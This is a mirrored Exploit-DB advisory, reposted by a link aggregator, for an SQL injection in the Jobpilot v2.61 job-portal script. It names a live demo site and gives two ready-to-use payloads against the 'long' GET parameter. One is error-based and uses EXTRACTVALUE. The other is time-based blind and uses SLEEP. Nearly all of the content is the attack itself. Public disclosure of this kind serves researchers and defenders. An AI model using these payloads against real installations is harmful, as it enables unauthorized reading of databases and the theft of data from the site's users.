2
[webapps] Jobpilot v2.61 - SQL Injection
source link: https://www.exploit-db.com/exploits/51527
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Jobpilot v2.61 - SQL Injection
EDB-ID:
51527
EDB Verified:
# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Parameter: long (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
(ELT(4894=4894,1))),0x71786b7171)) AND
(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK